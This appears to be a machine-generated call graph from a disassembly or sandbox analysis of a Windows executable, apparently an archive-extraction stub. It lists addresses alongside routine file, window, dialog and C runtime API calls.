23900->23772 23901->23897 23903 491378 23902->23903 23904 49131f 23902->23904 24036 49e2c1 GetWindowLongW SetWindowLongW 23903->24036 23906 491385 23904->23906 24035 49e2e8 62 API calls 2 library calls 23904->24035 23906->23740 23906->23741 23906->23742 23908 491341 23908->23906 23909 491354 GetDlgItem 23908->23909 23909->23906 23910 491364 23909->23910 23910->23906 23911 49136a SetWindowTextW 23910->23911 23911->23906 23914 49a0bb 23912->23914 23913 49a175 23913->23800 23913->23801 23914->23913 23915 49a14c 23914->23915 24037 49a2b2 23914->24037 23915->23913 23916 49a2b2 8 API calls 23915->23916 23916->23913 23918->23814 23920 499678 23919->23920 23921 4996d5 CreateFileW 23920->23921 23923 4996c9 23920->23923 23921->23923 23922 49971f 23922->23866 23923->23922 23924 49bb03 GetCurrentDirectoryW 23923->23924 23925 499704 23924->23925 23925->23922 23926 499708 CreateFileW 23925->23926 23926->23922 23928 4995cf 23927->23928 23929 4995be 23927->23929 23928->23825 23929->23928 23930 4995ca 23929->23930 23931 4995d1 23929->23931 24058 49974e 23930->24058 24063 499620 23931->24063 23934->23847 23935->23859 23936->23872 23938 4ac749 __EH_prolog 23937->23938 23939 4ab314 ExpandEnvironmentStringsW 23938->23939 23944 4abdcf 23938->23944 23951 4ac780 _wcslen _wcsrchr 23939->23951 23941 4ab314 ExpandEnvironmentStringsW 23941->23951 23942 4aca67 SetWindowTextW 23942->23951 23944->23884 23946 4b3e3e 22 API calls 23946->23951 23948 4ac855 SetFileAttributesW 23950 4ac90f GetFileAttributesW 23948->23950 23961 4ac86f __cftof _wcslen 23948->23961 23950->23951 23952 4ac921 DeleteFileW 23950->23952 23951->23941 23951->23942 23951->23944 23951->23946 23951->23948 23954 4acc31 GetDlgItem SetWindowTextW SendMessageW 23951->23954 23957 4acc71 SendMessageW 23951->23957 24078 4a1fbb CompareStringW 23951->24078 24079 4aa64d GetCurrentDirectoryW 23951->24079 24081 49a5d1 6 API calls 23951->24081 24082 49a55a FindClose 23951->24082 24083 4ab48e 76 API calls 2 library calls 23951->24083 23952->23951 23955 4ac932 23952->23955 23954->23951 23956 494092 _swprintf 51 API calls 23955->23956 23958 4ac952 GetFileAttributesW 23956->23958 23957->23951 23958->23955 23959 4ac967 MoveFileW 23958->23959 23959->23951 23960 4ac97f MoveFileExW 23959->23960 23960->23951 23961->23950 23961->23951 24080 49b991 51 API calls 3 library calls 23961->24080 23963 4ada5c __EH_prolog 23962->23963 24084 4a0659 23963->24084 23965 4ada8d 24088 495b3d 23965->24088 23967 4adaab 24092 497b0d 23967->24092 23971 4adafe 24108 497b9e 23971->24108 23973 4abdee 23973->23893 23975 4ad6a8 23974->23975 24602 4aa5c6 23975->24602 23978 4ad6b5 GetWindow 23979 4abf15 23978->23979 23982 4ad6d5 23978->23982 23979->23747 23979->23748 23980 4ad6e2 GetClassNameW 24607 4a1fbb CompareStringW 23980->24607 23982->23979 23982->23980 23983 4ad76a GetWindow 23982->23983 23984 4ad706 GetWindowLongW 23982->23984 23983->23979 23983->23982 23984->23983 23985 4ad716 SendMessageW 23984->23985 23985->23983 23986 4ad72c GetObjectW 23985->23986 24608 4aa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23986->24608 23989 4ad743 24609 4aa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23989->24609 24610 4aa80c 8 API calls 23989->24610 23991 4ad754 SendMessageW DeleteObject 23991->23983 23992->23762 23994 4aabcc 23993->23994 23995 4aabf1 23993->23995 24613 4a1fbb CompareStringW 23994->24613 23996 4aabff 23995->23996 23997 4aabf6 SHAutoComplete 23995->23997 24001 4ab093 23996->24001 23997->23996 23999 4aabdf 23999->23995 24000 4aabe3 FindWindowExW 23999->24000 24000->23995 24002 4ab09d __EH_prolog 24001->24002 24003 4913dc 84 API calls 24002->24003 24004 4ab0bf 24003->24004 24614 491fdc 24004->24614 24007 4ab0eb 24010 4919af 128 API calls 24007->24010 24008 4ab0d9 24009 491692 86 API calls 24008->24009 24012 4ab0e4 24009->24012 24013 4ab10d __InternalCxxFrameHandler ___std_exception_copy 24010->24013 24011 491692 86 API calls 24011->24012 24012->23792 24012->23796 24013->24011 24014->23771 24016 4ab568 5 API calls 24015->24016 24017 4ad4e0 GetDlgItem 24016->24017 24018 4ad502 24017->24018 24019 4ad536 SendMessageW SendMessageW 24017->24019 24024 4ad50d ShowWindow SendMessageW SendMessageW 24018->24024 24020 4ad572 24019->24020 24021 4ad591 SendMessageW SendMessageW SendMessageW 24019->24021 24020->24021 24022 4ad5e7 SendMessageW 24021->24022 24023 4ad5c4 SendMessageW 24021->24023 24022->23785 24023->24022 24024->24019 24025->23850 24026->23878 24027->23883 24028->23887 24029->23892 24030->23900 24031->23830 24032->23851 24033->23823 24034->23812 24035->23908 24036->23906 24038 49a2bf 24037->24038 24039 49a2e3 24038->24039 24040 49a2d6 CreateDirectoryW 24038->24040 24041 49a231 3 API calls 24039->24041 24040->24039 24042 49a316 24040->24042 24043 49a2e9 24041->24043 24045 49a325 24042->24045 24050 49a4ed 24042->24050 24044 49a329 GetLastError 24043->24044 24046 49bb03 GetCurrentDirectoryW 24043->24046 24044->24045 24045->23914 24048 49a2ff 24046->24048 24048->24044 24049 49a303 CreateDirectoryW 24048->24049 24049->24042 24049->24044 24051 4aec50 24050->24051 24052 49a4fa SetFileAttributesW 24051->24052 24053 49a53d 24052->24053 24054 49a510 24052->24054 24053->24045 24055 49bb03 GetCurrentDirectoryW 24054->24055 24056 49a524 24055->24056 24056->24053 24057 49a528 SetFileAttributesW 24056->24057 24057->24053 24059 499781 24058->24059 24060 499757 24058->24060 24059->23928 24060->24059 24069 49a1e0 24060->24069 24064 49962c 24063->24064 24066 49964a 24063->24066 24064->24066 24067 499638 CloseHandle 24064->24067 24065 499669 24065->23928 24066->24065 24077 496bd5 76 API calls 24066->24077 24067->24066 24070 4aec50 24069->24070 24071 49a1ed DeleteFileW 24070->24071 24072 49977f 24071->24072 24073 49a200 24071->24073 24072->23928 24074 49bb03 GetCurrentDirectoryW 24073->24074 24075 49a214 24074->24075 24075->24072 24076 49a218 DeleteFileW 24075->24076 24076->24072 24077->24065 24078->23951 24079->23951 24080->23961 24081->23951 24082->23951 24083->23951 24085 4a0666 _wcslen 24084->24085 24112 4917e9 24085->24112 24087 4a067e 24087->23965 24089 4a0659 _wcslen 24088->24089 24090 4917e9 78 API calls 24089->24090 24091 4a067e 24090->24091 24091->23967 24093 497b17 __EH_prolog 24092->24093 24129 49ce40 24093->24129 24095 497b32 24135 4aeb38 24095->24135 24097 497b5c 24144 4a4a76 24097->24144 24100 497c7d 24101 497c87 24100->24101 24103 497cf1 24101->24103 24176 49a56d 24101->24176 24104 497d50 24103->24104 24154 498284 24103->24154 24106 497d92 24104->24106 24182 49138b 74 API calls 24104->24182 24106->23971 24109 497bac 24108->24109 24110 497bb3 24108->24110 24111 4a2297 86 API calls 24109->24111 24111->24110 24113 4917ff 24112->24113 24124 49185a __InternalCxxFrameHandler 24112->24124 24114 491828 24113->24114 24125 496c36 76 API calls __vswprintf_c_l 24113->24125 24116 491887 24114->24116 24117 491847 ___std_exception_copy 24114->24117 24119 4b3e3e 22 API calls 24116->24119 24117->24124 24127 496ca7 75 API calls 24117->24127 24118 49181e 24126 496ca7 75 API calls 24118->24126 24121 49188e 24119->24121 24121->24124 24128 496ca7 75 API calls 24121->24128 24124->24087 24125->24118 24126->24114 24127->24124 24128->24124 24130 49ce4a __EH_prolog 24129->24130 24131 4aeb38 8 API calls 24130->24131 24132 49ce8d 24131->24132 24133 4aeb38 8 API calls 24132->24133 24134 49ceb1 24133->24134 24134->24095 24136 4aeb3d ___std_exception_copy 24135->24136 24137 4aeb57 24136->24137 24140 4aeb59 24136->24140 24150 4b7a5e 7 API calls 2 library calls 24136->24150 24137->24097 24139 4af5c9 24152 4b238d RaiseException 24139->24152 24140->24139 24151 4b238d RaiseException 24140->24151 24143 4af5e6 24145 4a4a80 __EH_prolog 24144->24145 24146 4aeb38 8 API calls 24145->24146 24147 4a4a9c 24146->24147 24148 497b8b 24147->24148 24153 4a0e46 80 API calls 24147->24153 24148->24100 24150->24136 24151->24139 24152->24143 24153->24148 24155 49828e __EH_prolog 24154->24155 24183 4913dc 24155->24183 24157 4982aa 24158 4982bb 24157->24158 24326 499f42 24157->24326 24161 4982f2 24158->24161 24191 491a04 24158->24191 24322 491692 24161->24322 24167 4983e8 24218 491f6d 24167->24218 24170 4983f3 24170->24161 24222 493b2d 24170->24222 24234 49848e 24170->24234 24172 49a56d 7 API calls 24173 4982ee 24172->24173 24173->24161 24173->24172 24175 498389 24173->24175 24330 49c0c5 CompareStringW _wcslen 24173->24330 24210 498430 24175->24210 24177 49a582 24176->24177 24181 49a5b0 24177->24181 24591 49a69b 24177->24591 24179 49a592 24180 49a597 FindClose 24179->24180 24179->24181 24180->24181 24181->24101 24182->24106 24184 4913e1 __EH_prolog 24183->24184 24185 49ce40 8 API calls 24184->24185 24186 491419 24185->24186 24187 4aeb38 8 API calls 24186->24187 24190 491474 __cftof 24186->24190 24188 491461 24187->24188 24189 49b505 84 API calls 24188->24189 24188->24190 24189->24190 24190->24157 24192 491a0e __EH_prolog 24191->24192 24204 491a61 24192->24204 24206 491b9b 24192->24206 24331 4913ba 24192->24331 24194 491bc7 24343 49138b 74 API calls 24194->24343 24197 493b2d 101 API calls 24200 491c12 24197->24200 24198 491bd4 24198->24197 24198->24206 24199 491c5a 24203 491c8d 24199->24203 24199->24206 24344 49138b 74 API calls 24199->24344 24200->24199 24202 493b2d 101 API calls 24200->24202 24202->24200 24203->24206 24208 499e80 79 API calls 24203->24208 24204->24194 24204->24198 24204->24206 24205 493b2d 101 API calls 24207 491cde 24205->24207 24206->24173 24207->24205 24207->24206 24208->24207 24364 49cf3d 24210->24364 24212 498440 24368 4a13d2 GetSystemTime SystemTimeToFileTime 24212->24368 24214 4983a3 24214->24167 24215 4a1b66 24214->24215 24373 4ade6b 24215->24373 24219 491f72 __EH_prolog 24218->24219 24221 491fa6 24219->24221 24381 4919af 24219->24381 24221->24170 24223 493b39 24222->24223 24224 493b3d 24222->24224 24223->24170 24233 499e80 79 API calls 24224->24233 24225 493b4f 24226 493b78 24225->24226 24227 493b6a 24225->24227 24514 49286b 101 API calls 3 library calls 24226->24514 24228 493baa 24227->24228 24513 4932f7 89 API calls 2 library calls 24227->24513 24228->24170 24231 493b76 24231->24228 24515 4920d7 74 API calls 24231->24515 24233->24225 24235 498498 __EH_prolog 24234->24235 24238 4984d5 24235->24238 24245 498513 24235->24245 24540 4a8c8d 103 API calls 24235->24540 24237 4984f5 24239 4984fa 24237->24239 24240 49851c 24237->24240 24238->24237 24243 49857a 24238->24243 24238->24245 24239->24245 24541 497a0d 152 API calls 24239->24541 24240->24245 24542 4a8c8d 103 API calls 24240->24542 24243->24245 24516 495d1a 24243->24516 24245->24170 24246 498605 24246->24245 24522 498167 24246->24522 24249 498797 24250 49a56d 7 API calls 24249->24250 24251 498802 24249->24251 24250->24251 24528 497c0d 24251->24528 24253 49d051 82 API calls 24259 49885d 24253->24259 24254 498992 24255 498a5f 24254->24255 24262 4989e1 24254->24262 24260 498ab6 24255->24260 24272 498a6a 24255->24272 24256 49898b 24545 492021 74 API calls 24256->24545 24259->24245 24259->24253 24259->24254 24259->24256 24543 498117 84 API calls 24259->24543 24544 492021 74 API calls 24259->24544 24264 498a4c 24260->24264 24548 497fc0 97 API calls 24260->24548 24261 498ab4 24265 49959a 80 API calls 24261->24265 24262->24264 24266 49a231 3 API calls 24262->24266 24269 498b14 24262->24269 24263 49959a 80 API calls 24263->24245 24264->24261 24264->24269 24265->24245 24268 498a19 24266->24268 24268->24264 24546 4992a3 97 API calls 24268->24546 24281 498b82 24269->24281 24310 499105 24269->24310 24549 4998bc 24269->24549 24270 49ab1a 8 API calls 24273 498bd1 24270->24273 24272->24261 24547 497db2 101 API calls 24272->24547 24276 49ab1a 8 API calls 24273->24276 24295 498be7 24276->24295 24279 498b70 24553 496e98 77 API calls 24279->24553 24281->24270 24282 498cbc 24283 498d18 24282->24283 24284 498e40 24282->24284 24285 498d8a 24283->24285 24293 498d28 24283->24293 24286 498e52 24284->24286 24287 498e66 24284->24287 24308 498d49 24284->24308 24292 498167 19 API calls 24285->24292 24288 499215 123 API calls 24286->24288 24289 4a3377 75 API calls 24287->24289 24288->24308 24290 498e7f 24289->24290 24559 4a3020 123 API calls 24290->24559 24291 498d6e 24291->24308 24556 4977b8 111 API calls 24291->24556 24297 498dbd 24292->24297 24293->24291 24298 498d37 24293->24298 24295->24282 24300 49981a 79 API calls 24295->24300 24302 498c93 24295->24302 24303 498df5 24297->24303 24304 498de6 24297->24304 24297->24308 24555 492021 74 API calls 24298->24555 24300->24302 24302->24282 24554 499a3c 82 API calls 24302->24554 24558 499155 93 API calls __EH_prolog 24303->24558 24557 497542 85 API calls 24304->24557 24311 498f85 24308->24311 24560 492021 74 API calls 24308->24560 24309 499090 24309->24310 24312 49a4ed 3 API calls 24309->24312 24310->24263 24311->24309 24311->24310 24313 49903e 24311->24313 24534 499f09 SetEndOfFile 24311->24534 24314 4990eb 24312->24314 24535 499da2 24313->24535 24314->24310 24561 492021 74 API calls 24314->24561 24317 499085 24318 499620 77 API calls 24317->24318 24318->24309 24320 4990fb 24562 496dcb 76 API calls _wcschr 24320->24562 24323 4916a4 24322->24323 24578 49cee1 24323->24578 24328 499f59 24326->24328 24327 499f63 24327->24158 24328->24327 24590 496d0c 78 API calls 24328->24590 24330->24173 24345 491732 24331->24345 24333 4913d6 24334 499e80 24333->24334 24335 499e92 24334->24335 24338 499ea5 24334->24338 24339 499eb0 24335->24339 24362 496d5b 77 API calls 24335->24362 24337 499eb8 SetFilePointer 24337->24339 24340 499ed4 GetLastError 24337->24340 24338->24337 24338->24339 24339->24204 24340->24339 24341 499ede 24340->24341 24341->24339 24363 496d5b 77 API calls 24341->24363 24343->24206 24344->24203 24346 491748 24345->24346 24357 4917a0 __InternalCxxFrameHandler 24345->24357 24347 491771 24346->24347 24358 496c36 76 API calls __vswprintf_c_l 24346->24358 24349 4917c7 24347->24349 24354 49178d ___std_exception_copy 24347->24354 24351 4b3e3e 22 API calls 24349->24351 24350 491767 24359 496ca7 75 API calls 24350->24359 24353 4917ce 24351->24353 24353->24357 24361 496ca7 75 API calls 24353->24361 24354->24357 24360 496ca7 75 API calls 24354->24360 24357->24333 24358->24350 24359->24347 24360->24357 24361->24357 24362->24338 24363->24339 24365 49cf4d 24364->24365 24367 49cf54 24364->24367 24369 49981a 24365->24369 24367->24212 24368->24214 24370 499833 24369->24370 24372 499e80 79 API calls 24370->24372 24371 499865 24371->24367 24372->24371 24374 4ade78 24373->24374 24375 49e617 53 API calls 24374->24375 24376 4ade9b 24375->24376 24377 494092 _swprintf 51 API calls 24376->24377 24378 4adead 24377->24378 24379 4ad4d4 16 API calls 24378->24379 24380 4a1b7c 24379->24380 24380->24167 24382 4919bb 24381->24382 24383 4919bf 24381->24383 24382->24221 24386 499e80 79 API calls 24383->24386 24384 4919d4 24387 4918f6 24384->24387 24386->24384 24388 491908 24387->24388 24389 491945 24387->24389 24390 493b2d 101 API calls 24388->24390 24395 493fa3 24389->24395 24393 491928 24390->24393 24393->24382 24399 493fac 24395->24399 24396 493b2d 101 API calls 24396->24399 24397 491966 24397->24393 24400 491e50 24397->24400 24399->24396 24399->24397 24412 4a0e08 24399->24412 24401 491e5a __EH_prolog 24400->24401 24420 493bba 24401->24420 24403 491e84 24404 491732 78 API calls 24403->24404 24406 491f0b 24403->24406 24405 491e9b 24404->24405 24448 4918a9 78 API calls 24405->24448 24406->24393 24408 491eb3 24410 491ebf _wcslen 24408->24410 24449 4a1b84 MultiByteToWideChar 24408->24449 24450 4918a9 78 API calls 24410->24450 24413 4a0e0f 24412->24413 24416 4a0e2a 24413->24416 24418 496c31 RaiseException CallUnexpected 24413->24418 24415 4a0e3b SetThreadExecutionState 24415->24399 24416->24415 24419 496c31 RaiseException CallUnexpected 24416->24419 24418->24416 24419->24415 24421 493bc4 __EH_prolog 24420->24421 24422 493bda 24421->24422 24423 493bf6 24421->24423 24476 49138b 74 API calls 24422->24476 24424 493e51 24423->24424 24428 493c22 24423->24428 24493 49138b 74 API calls 24424->24493 24427 493be5 24427->24403 24428->24427 24451 4a3377 24428->24451 24430 493c71 24432 493ca3 24430->24432 24433 493c9f 24430->24433 24435 493c8f 24430->24435 24431 493d2e 24461 49ab1a 24431->24461 24432->24431 24447 493c9a 24432->24447 24479 49d051 24432->24479 24433->24432 24478 4920bd 78 API calls 24433->24478 24477 49138b 74 API calls 24435->24477 24440 493d41 24441 493dd7 24440->24441 24442 493dc7 24440->24442 24485 4a3020 123 API calls 24441->24485 24465 499215 24442->24465 24445 493dd5 24445->24447 24486 492021 74 API calls 24445->24486 24487 4a2297 24447->24487 24448->24408 24449->24410 24450->24406 24452 4a338c 24451->24452 24454 4a3396 ___std_exception_copy 24451->24454 24494 496ca7 75 API calls 24452->24494 24455 4a341c 24454->24455 24456 4a34c6 24454->24456 24460 4a3440 __cftof 24454->24460 24495 4a32aa 75 API calls 3 library calls 24455->24495 24496 4b238d RaiseException 24456->24496 24459 4a34f2 24460->24430 24462 49ab28 24461->24462 24463 49ab32 24461->24463 24464 4aeb38 8 API calls 24462->24464 24463->24440 24464->24463 24466 49921f __EH_prolog 24465->24466 24497 497c64 24466->24497 24469 4913ba 78 API calls 24470 499231 24469->24470 24500 49d114 24470->24500 24472 499243 24473 49928a 24472->24473 24475 49d114 118 API calls 24472->24475 24509 49d300 97 API calls __InternalCxxFrameHandler 24472->24509 24473->24445 24475->24472 24476->24427 24477->24447 24478->24432 24480 49d072 24479->24480 24481 49d084 24479->24481 24510 49603a 82 API calls 24480->24510 24511 49603a 82 API calls 24481->24511 24484 49d07c 24484->24431 24485->24445 24486->24447 24489 4a22a1 24487->24489 24488 4a22ba 24512 4a0eed 86 API calls 24488->24512 24489->24488 24492 4a22ce 24489->24492 24491 4a22c1 24491->24492 24493->24427 24494->24454 24495->24460 24496->24459 24498 49b146 GetVersionExW 24497->24498 24499 497c69 24498->24499 24499->24469 24507 49d12a __InternalCxxFrameHandler 24500->24507 24501 49d29a 24502 49d2ce 24501->24502 24503 49d0cb 6 API calls 24501->24503 24504 4a0e08 SetThreadExecutionState RaiseException 24502->24504 24503->24502 24506 49d291 24504->24506 24505 4a8c8d 103 API calls 24505->24507 24506->24472 24507->24501 24507->24505 24507->24506 24508 49ac05 91 API calls 24507->24508 24508->24507 24509->24472 24510->24484 24511->24484 24512->24491 24513->24231 24514->24231 24515->24228 24517 495d2a 24516->24517 24563 495c4b 24517->24563 24519 495d5d 24521 495d95 24519->24521 24568 49b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 24519->24568 24521->24246 24523 498186 24522->24523 24524 498232 24523->24524 24575 49be5e 19 API calls __InternalCxxFrameHandler 24523->24575 24574 4a1fac CharUpperW 24524->24574 24527 49823b 24527->24249 24529 497c22 24528->24529 24530 497c5a 24529->24530 24576 496e7a 74 API calls 24529->24576 24530->24259 24532 497c52 24577 49138b 74 API calls 24532->24577 24534->24313 24536 499db3 24535->24536 24539 499dc2 24535->24539 24537 499db9 FlushFileBuffers 24536->24537 24536->24539 24537->24539 24538 499e3f SetFileTime 24538->24317 24539->24538 24540->24238 24541->24245 24542->24245 24543->24259 24544->24259 24545->24254 24546->24264 24547->24261 24548->24264 24550 498b5a 24549->24550 24551 4998c5 GetFileType 24549->24551 24550->24281 24552 492021 74 API calls 24550->24552 24551->24550 24552->24279 24553->24281 24554->24282 24555->24308 24556->24308 24557->24308 24558->24308 24559->24308 24560->24311 24561->24320 24562->24310 24569 495b48 24563->24569 24565 495c6c 24565->24519 24567 495b48 2 API calls 24567->24565 24568->24519 24570 495b52 24569->24570 24572 495c3a 24570->24572 24573 49b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 24570->24573 24572->24565 24572->24567 24573->24570 24574->24527 24575->24524 24576->24532 24577->24530 24579 49cef2 24578->24579 24584 49a99e 24579->24584 24581 49cf24 24582 49a99e 86 API calls 24581->24582 24583 49cf2f 24582->24583 24585 49a9c1 24584->24585 24588 49a9d5 24584->24588 24589 4a0eed 86 API calls 24585->24589 24587 49a9c8 24587->24588 24588->24581 24589->24587 24590->24327 24592 49a6a8 24591->24592 24593 49a6c1 FindFirstFileW 24592->24593 24594 49a727 FindNextFileW 24592->24594 24595 49a709 24593->24595 24597 49a6d0 24593->24597 24594->24595 24596 49a732 GetLastError 24594->24596 24595->24179 24596->24595 24598 49bb03 GetCurrentDirectoryW 24597->24598 24599 49a6e0 24598->24599 24600 49a6fe GetLastError 24599->24600 24601 49a6e4 FindFirstFileW 24599->24601 24600->24595 24601->24595 24601->24600 24611 4aa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24602->24611 24604 4aa5cd 24605 4aa5d9 24604->24605 24612 4aa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24604->24612 24605->23978 24605->23979 24607->23982 24608->23989 24609->23989 24610->23991 24611->24604 24612->24605 24613->23999 24615 499f42 78 API calls 24614->24615 24616 491fe8 24615->24616 24617 491a04 101 API calls 24616->24617 24620 492005 24616->24620 24618 491ff5 24617->24618 24618->24620 24621 49138b 74 API calls 24618->24621 24620->24007 24620->24008 24621->24620 25357 4a94e0 GetClientRect 25387 4a21e0 26 API calls std::bad_exception::bad_exception 25409 4af2e0 46 API calls __RTC_Initialize 25410 4bbee0 GetCommandLineA GetCommandLineW 24622 4aeae7 24623 4aeaf1 24622->24623 24624 4ae85d ___delayLoadHelper2@8 14 API calls 24623->24624 24625 4aeafe 24624->24625 25358 4af4e7 29 API calls _abort 25359 4b2cfb 38 API calls 4 library calls 25388 4995f0 80 API calls 25411 495ef0 82 API calls 24642 4b98f0 24650 4badaf 24642->24650 24645 4b9904 24647 4b990c 24648 4b9919 24647->24648 24658 4b9920 11 API calls 24647->24658 24659 4bac98 24650->24659 24653 4badee TlsAlloc 24654 4baddf 24653->24654 24655 4afbbc CatchGuardHandler 5 API calls 24654->24655 24656 4b98fa 24655->24656 24656->24645 24657 4b9869 20 API calls 2 library calls 24656->24657 24657->24647 24658->24645 24660 4bacc8 24659->24660 24662 4bacc4 24659->24662 24660->24653 24660->24654 24662->24660 24664 4bace8 24662->24664 24666 4bad34 24662->24666 24663 4bacf4 GetProcAddress 24665 4bad04 _unexpected 24663->24665 24664->24660 24664->24663 24665->24660 24667 4bad55 LoadLibraryExW 24666->24667 24668 4bad4a 24666->24668 24669 4bad8a 24667->24669 24670 4bad72 GetLastError 24667->24670 24668->24662 24669->24668 24671 4bada1 FreeLibrary 24669->24671 24670->24669 24672 4bad7d LoadLibraryExW 24670->24672 24671->24668 24672->24669 24673 4babf0 24674 4babfb 24673->24674 24676 4bac24 24674->24676 24678 4bac20 24674->24678 24679 4baf0a 24674->24679 24686 4bac50 DeleteCriticalSection 24676->24686 24680 4bac98 _unexpected 5 API calls 24679->24680 24681 4baf31 24680->24681 24682 4baf4f InitializeCriticalSectionAndSpinCount 24681->24682 24683 4baf3a 24681->24683 24682->24683 24684 4afbbc CatchGuardHandler 5 API calls 24683->24684 24685 4baf66 24684->24685 24685->24674 24686->24678 25360 4b88f0 7 API calls ___scrt_uninitialize_crt 25390 4afd4f 9 API calls 2 library calls 25362 4ac793 97 API calls 4 library calls 25392 4ab18d 78 API calls 25393 4a9580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25412 4ac793 102 API calls 5 library calls 25364 4bb49d 6 API calls CatchGuardHandler 25432 496faa 111 API calls 3 library calls 25433 4af3a0 27 API calls 25368 4ba4a0 71 API calls _free 25369 4adca1 DialogBoxParamW 25370 4c08a0 IsProcessorFeaturePresent 25395 4aeda7 48 API calls _unexpected 25434 4a1bbd GetCPInfo IsDBCSLeadByte 24721 4af3b2 24722 4af3be __FrameHandler3::FrameUnwindToState 24721->24722 24753 4aeed7 24722->24753 24724 4af3c5 24725 4af518 24724->24725 24728 4af3ef 24724->24728 24826 4af838 4 API calls 2 library calls 24725->24826 24727 4af51f 24819 4b7f58 24727->24819 24739 4af42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24728->24739 24764 4b8aed 24728->24764 24735 4af40e 24737 4af48f 24772 4af953 GetStartupInfoW __cftof 24737->24772 24739->24737 24822 4b7af4 38 API calls 2 library calls 24739->24822 24740 4af495 24773 4b8a3e 51 API calls 24740->24773 24743 4af49d 24774 4adf1e 24743->24774 24747 4af4b1 24747->24727 24748 4af4b5 24747->24748 24749 4af4be 24748->24749 24824 4b7efb 28 API calls _abort 24748->24824 24825 4af048 12 API calls ___scrt_uninitialize_crt 24749->24825 24752 4af4c6 24752->24735 24754 4aeee0 24753->24754 24828 4af654 IsProcessorFeaturePresent 24754->24828 24756 4aeeec 24829 4b2a5e 24756->24829 24758 4aeef1 24759 4aeef5 24758->24759 24837 4b8977 24758->24837 24759->24724 24762 4aef0c 24762->24724 24765 4b8b04 24764->24765 24766 4afbbc CatchGuardHandler 5 API calls 24765->24766 24767 4af408 24766->24767 24767->24735 24768 4b8a91 24767->24768 24770 4b8ac0 24768->24770 24769 4afbbc CatchGuardHandler 5 API calls 24771 4b8ae9 24769->24771 24770->24769 24771->24739 24772->24740 24773->24743 24930 4a0863 24774->24930 24778 4adf3d 24979 4aac16 24778->24979 24780 4adf46 __cftof 24781 4adf59 GetCommandLineW 24780->24781 24782 4adf68 24781->24782 24783 4adfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24781->24783 24983 4ac5c4 24782->24983 24784 494092 _swprintf 51 API calls 24783->24784 24786 4ae04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24784->24786 24994 4ab6dd LoadBitmapW 24786->24994 24788 4adfe0 24988 4adbde 24788->24988 24789 4adf76 OpenFileMappingW 24791 4adf8f MapViewOfFile 24789->24791 24792 4adfd6 CloseHandle 24789->24792 24796 4adfcd UnmapViewOfFile 24791->24796 24797 4adfa0 __InternalCxxFrameHandler 24791->24797 24792->24783 24796->24792 24801 4adbde 2 API calls 24797->24801 24803 4adfbc 24801->24803 24802 4a90b7 8 API calls 24804 4ae0aa DialogBoxParamW 24802->24804 24803->24796 24805 4ae0e4 24804->24805 24806 4ae0fd 24805->24806 24807 4ae0f6 Sleep 24805->24807 24810 4ae10b 24806->24810 25024 4aae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 24806->25024 24807->24806 24809 4ae12a DeleteObject 24811 4ae13f DeleteObject 24809->24811 24812 4ae146 24809->24812 24810->24809 24811->24812 24813 4ae189 24812->24813 24814 4ae177 24812->24814 25021 4aac7c 24813->25021 25025 4adc3b 6 API calls 24814->25025 24817 4ae17d CloseHandle 24817->24813 24818 4ae1c3 24823 4af993 GetModuleHandleW 24818->24823 25155 4b7cd5 24819->25155 24822->24737 24823->24747 24824->24749 24825->24752 24826->24727 24828->24756 24841 4b3b07 24829->24841 24832 4b2a67 24832->24758 24834 4b2a6f 24835 4b2a7a 24834->24835 24855 4b3b43 DeleteCriticalSection 24834->24855 24835->24758 24884 4bc05a 24837->24884 24840 4b2a7d 7 API calls 2 library calls 24840->24759 24842 4b3b10 24841->24842 24844 4b3b39 24842->24844 24845 4b2a63 24842->24845 24856 4b3d46 24842->24856 24861 4b3b43 DeleteCriticalSection 24844->24861 24845->24832 24847 4b2b8c 24845->24847 24877 4b3c57 24847->24877 24850 4b2ba1 24850->24834 24852 4b2baf 24853 4b2bbc 24852->24853 24883 4b2bbf 6 API calls ___vcrt_FlsFree 24852->24883 24853->24834 24855->24832 24862 4b3c0d 24856->24862 24859 4b3d7e InitializeCriticalSectionAndSpinCount 24860 4b3d69 24859->24860 24860->24842 24861->24845 24863 4b3c4f 24862->24863 24864 4b3c26 24862->24864 24863->24859 24863->24860 24864->24863 24869 4b3b72 24864->24869 24867 4b3c3b GetProcAddress 24867->24863 24868 4b3c49 24867->24868 24868->24863 24870 4b3b7e ___vcrt_FlsGetValue 24869->24870 24871 4b3bf3 24870->24871 24872 4b3b95 LoadLibraryExW 24870->24872 24876 4b3bd5 LoadLibraryExW 24870->24876 24871->24863 24871->24867 24873 4b3bfa 24872->24873 24874 4b3bb3 GetLastError 24872->24874 24873->24871 24875 4b3c02 FreeLibrary 24873->24875 24874->24870 24875->24871 24876->24870 24876->24873 24878 4b3c0d ___vcrt_FlsGetValue 5 API calls 24877->24878 24879 4b3c71 24878->24879 24880 4b3c8a TlsAlloc 24879->24880 24881 4b2b96 24879->24881 24881->24850 24882 4b3d08 6 API calls ___vcrt_FlsGetValue 24881->24882 24882->24852 24883->24850 24887 4bc077 24884->24887 24888 4bc073 24884->24888 24885 4afbbc CatchGuardHandler 5 API calls 24886 4aeefe 24885->24886 24886->24762 24886->24840 24887->24888 24890 4ba6a0 24887->24890 24888->24885 24891 4ba6ac __FrameHandler3::FrameUnwindToState 24890->24891 24902 4bac31 EnterCriticalSection 24891->24902 24893 4ba6b3 24903 4bc528 24893->24903 24895 4ba6c2 24896 4ba6d1 24895->24896 24916 4ba529 29 API calls 24895->24916 24918 4ba6ed LeaveCriticalSection _abort 24896->24918 24899 4ba6cc 24917 4ba5df GetStdHandle GetFileType 24899->24917 24901 4ba6e2 _abort 24901->24887 24902->24893 24904 4bc534 __FrameHandler3::FrameUnwindToState 24903->24904 24905 4bc558 24904->24905 24906 4bc541 24904->24906 24919 4bac31 EnterCriticalSection 24905->24919 24927 4b91a8 20 API calls _free 24906->24927 24909 4bc546 24928 4b9087 26 API calls ___std_exception_copy 24909->24928 24911 4bc550 _abort 24911->24895 24912 4bc590 24929 4bc5b7 LeaveCriticalSection _abort 